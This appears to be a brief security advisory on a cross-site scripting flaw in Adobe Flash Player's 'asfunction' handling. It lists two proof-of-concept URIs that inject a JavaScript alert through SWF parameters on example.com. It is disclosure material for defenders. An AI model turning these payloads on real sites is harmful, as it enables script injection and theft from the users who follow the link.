|
Adobe Flash Player 'asfunction' Cross Site Scripting Vulnerability
An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI. The following proof-of-concept URIs are available: http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)// http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)// |
|
|
Privacy Statement |